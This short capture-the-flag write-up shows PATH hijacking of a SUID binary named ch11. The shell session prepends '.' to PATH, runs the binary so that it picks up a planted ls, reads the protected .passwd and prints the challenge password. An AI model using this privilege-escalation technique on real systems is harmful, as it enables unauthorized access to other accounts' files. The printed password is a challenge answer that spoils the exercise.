ch11 has SUID permission, and the ls command depends on the PATH environment variable.
The goal is reading the .passwd.
app-script-ch11@challenge02:~$ /bin/ls -al /tmp/ls
-rwxr-x--- 1 app-script-ch11 app-script-ch11 44 Sep 30 00:34 /tmp/ls
app-script-ch11@challenge02:~$
app-script-ch11@challenge02:~$ mkdir /tmp/test2
app-script-ch11@challenge02:~$ cd /tmp/test2
app-script-ch11@challenge02:/tmp/test2$ export PATH=".:$PATH"
app-script-ch11@challenge02:/tmp/test2$ ~/ch11
!oPe96a/.s8d5
app-script-ch11@challenge02:/tmp/test2$
PASSWORD : !oPe96a/.s8d5
DONE YOU CRACK THIS CHALLANGE❤️EZZ